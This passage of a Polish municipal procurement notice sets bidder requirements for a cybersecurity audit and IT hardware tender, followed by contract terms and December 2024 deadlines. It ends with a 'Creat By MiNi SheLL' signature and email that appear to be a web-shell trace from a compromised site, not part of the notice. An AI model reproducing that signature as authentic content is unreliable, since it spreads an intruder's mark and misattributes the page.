niepodlegający wykluczeniu z postępowania, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy <br/>- w tym okresie, wykaże się:<br/> - dla części pierwszej zamówienia <br/>I.	Dysponuje co najmniej dwiema osobami posiadającymi uprawnienia wykazane <br/>w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu (Dz.U.2018 poz.1999 z dnia 2018.10.18) w rozumieniu art. 15 ustawy z dnia 5 lipca 2018 r. o krajowym systemie cyberbezpieczeństwa. Potwierdzeniem spełnienia warunku posiadania ww. uprawnień będzie złożenie wraz z ofertą skanu oryginału certyfikatu.:<br/><br/>1) Certified Internal Auditor (CIA),<br/>2) Certified Information System Auditor (CISA),<br/>3) Certyfikat audytora wiodącego systemu zarządzania bezpieczeństwem informacji według normyPN-EN ISO/IEC 27001 wydany przez jednostkę oceniającą zgodność, akredytowaną zgodniez przepisami ustawy z dnia 13 kwietnia 2016 r. o systemach oceny zgodności i nadzoru rynku (Dz. U. z 2017 r. poz. 1398 oraz z 2018 r. poz. 650 i 1338), w zakresie certyfikacji osób,<br/>4) Certyfikat audytora wiodącego systemu zarządzania ciągłością działania PN-EN ISO 22301 wydany przez jednostkę oceniającą zgodność, akredytowaną zgodnie z przepisami ustawy z dnia 13 kwietnia 2016 r. o systemach oceny zgodności i nadzoru rynku, w zakresie certyfikacji osób,<br/>5) Certified Information Security Manager (CISM)<br/>6) Certified in Risk and Information Systems Control (CRISC)<br/>7) Certified in the Governance of Enterprise IT (CGEIT)<br/>8) Certified Information Systems Security Professional (CISSP)<br/>9) Systems Security Certified Practitioner (SSCP)<br/>10) Certified Reliability Professional<br/>11) Certyfikaty uprawniające do posiadania tytułu ISA/IEC 62443 Cybersecurity Expert.<br/>II. Posiada ważne certyfikaty wydane przez jednostkę akredytowaną, tj. Polskie Centrum Akredytacji zgodny z wymogami międzynarodowej normy standaryzującej systemy zarządzania bezpieczeństwem informacji ISO/IEC 27001:2022 oraz normy standaryzującej system zarządzania ciągłością działania PN-EN ISO 22301:2020-04. <br/>III. Dysponuje co najmniej trzema osobami posiadającymi kompetencji w zakresie stosowania normy PN-EN ISO 19011:2018-08 – potwierdzone certyfikatem.<br/>IV. Dysponuje co najmniej jedną osobą posiadającą certyfikat - Certified Ethical Hacker (CEH),<br/>V. Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), należycie zrealizował co najmniej 3 zamówienia polegających na przeprowadzeniu audytu bezpieczeństwa informacji, zgodnie z wymaganiami zawartymi w Krajowych Ramach Interoperacyjności w jednostkach samorządu terytorialnego. Aby potwierdzić spełnienie powyższego warunku należy przesłać odpowiednie referencje lub inne dokumenty wskazujące na realizację takiego zadania. Zamawiający zastrzega sobie możliwość sprawdzenia informacji zawartych w przesłanej dokumentacji. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.<br/>VI. Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), należycie zrealizował co najmniej 3 zamówienia polegającego na przeprowadzeniu skanów/testów podatności infrastruktury teleinformatycznej. Aby potwierdzić spełnienie powyższego warunku należy przesłać odpowiednie referencje lub inne dokumenty wskazujące na realizację takiego zadania. Zamawiający zastrzega sobie możliwość sprawdzenia informacji zawartych w przesłanej dokumentacji. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.<br/>VII. Wykonawca w okresie trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), należycie zrealizował co najmniej 3 zamówień polegających na opracowaniu dokumentacji Systemu Zarządzania Bezpieczeństwem Informacji w jednostkach samorządu terytorialnego. Aby potwierdzić spełnienie powyższego warunku należy przesłać odpowiednie referencje lub inne dokumenty wskazujące na realizację takiego zadania. Zamawiający zastrzega sobie możliwość sprawdzenia informacji zawartych <br/>w przesłanej dokumentacji. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.<br/>IX. Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert <br/>(a jeżeli okres prowadzenia działalności jest krótszy w tym okresie), należycie zrealizował co najmniej 4 zamówienia polegających na przeprowadzeniu szkolenia <br/>z zakresu cyberbezpieczeństwa. Aby potwierdzić spełnienie powyższego warunku należy przesłać odpowiednie referencje lub inne dokumenty wskazujące na realizację takiego zadania. Zamawiający zastrzega sobie możliwość sprawdzenia informacji zawartych w przesłanej dokumentacji. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu.<br/>- dla części drugiej zamówienia <br/>1. W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie:<br/>co najmniej jedną dostawę na kwotę minimum 200 000,00 zł brutto, obejmującą dostarczenie i wdrożenie sprzętu komputerowego takiego jak serwer, macierz dyskowa, urządzenia UTM, przełącznik sieciowy.<br/>2. Dysponują lub będą dysponować osobami niezbędnymi do wykonania zamówienia:<br/> 1) co najmniej jedną osobą posiadający certyfikat producenta w zakresie oferowanej macierzy dyskowej na poziomie minimum proffessional.<br/> 2) co najmniej jedną osobą posiadający certyfikat producenta w zakresie oferowanych urządzeń klasy UTM na poziomie minimum proffessional. Zamawiający dopuszcza łączenie kwalifikacji zawodowych określonych <br/>w ppkt 1 i 2) przez jedną osobę.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonywana na podstawie oświadczenia złożonego w formie wykazu osób. <br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonywania zmian Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zmiana Umowy dopuszczalna będzie w granicach wyznaczonych przepisami ustawy Pzp, w tym art. 455 ustawy Pzp lub w zakresie i na warunkach określonych w ogłoszeniu o zamówieniu oraz niniejszej Umowie. <br/>2.	Zamawiający, zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp dopuszcza możliwość zmian postanowień Umowy w stosunku do treści oferty w zakresie i na warunkach określonych poniżej: <br/>1) zmiany wynagrodzenia umownego w przypadku: <br/>a)	wystąpienia przesłanek określonych w art. 3571 Kodeksu Cywilnego, <br/>b)	Zamawiający dopuszcza możliwość zmiany wynagrodzenia Wykonawcy <br/>w części dotyczącej podatku VAT oraz wynagrodzenia brutto, jeżeli w okresie realizacji umowy ulegnie zmianie w drodze ustawowej stawka podatku VAT będąca elementem wynagrodzenia Wykonawcy. Zmiana stawki VAT będzie miała zastosowanie do usług zrealizowanych po dacie wejścia w życie przepisów dotyczących zmiany stawki VAT, <br/>c)	w przypadku wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści niniejszej umowy; <br/>3.	Wszystkie okoliczności wymienione w niniejszym paragrafie stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <br/>4.	Zmiana postanowień niniejszej umowy może nastąpić pod rygorem nieważności, w formie pisemnego aneksu i tylko w granicach przewidzianych w umowie i ustawie Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urzad Miejski w Dynowie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com